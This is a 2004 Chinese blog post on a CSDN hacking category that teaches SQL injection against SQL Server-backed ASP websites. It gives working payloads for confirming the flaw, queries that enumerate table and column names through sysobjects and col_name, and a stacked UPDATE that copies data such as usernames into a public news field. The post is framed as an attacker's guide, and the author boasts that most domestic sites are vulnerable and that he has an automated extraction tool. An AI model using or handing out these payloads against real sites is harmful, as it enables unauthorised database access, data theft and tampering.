CSDN博客

img dengwei007

专门针对SQL Server的注入手段

发表于2004/7/13 17:35:00  1031人阅读

分类: Hacker's Tech

小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比……

关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。

首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用' or 1=1 or '1'='。

而sql server特别的还有user>0,db_name()>0。但是这些手法都只是检测漏洞的方法,真正有用的在下面。

1、获得所有的Table表名

(Select distinct Top 1 name from sysobjects where xtype='U' and status>0 and name not in (select distinct top i name from sysobjects where xtype='U' and status>0 order by name) order by name)>0

i为一个整数,i取1时,返回第一个table name(按表名排序),2返回第二个,依此类推,直到什么都没有返回为止。

2、得到表名后再获得字段名(field name)

(Select Top 1 col_name(object_id('TableName'),i) from sysobjects)>0

这一句返回TableName这个表里第i个字段的名字

3、得到所有的表名以及里面字段名,估计对这个网站的结构也就有相应的了解了。然后怎样获得字段中的数据呢?

如果是字符串,自然用>0的技俩,如果是其它类型,那就找一个新闻之类的表,再用

;update news set caption=(select username from users where id=9) where newsid=100;--  之类的方法把你要的数据写出来,这样基本上就没有你不知道的内容了。

我自己用VB做了个软件,自动获得表名和字段名,速度极快,瞬间整个数据库的结构就出来了。

当然这些不过是sql语句的构造而已,没什么过多的技术,另外这一个网页也是sql server injection必备的哟http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_tsqlcon_6lyk.asp

0 0

相关博文

我的热门文章

img
取 消
img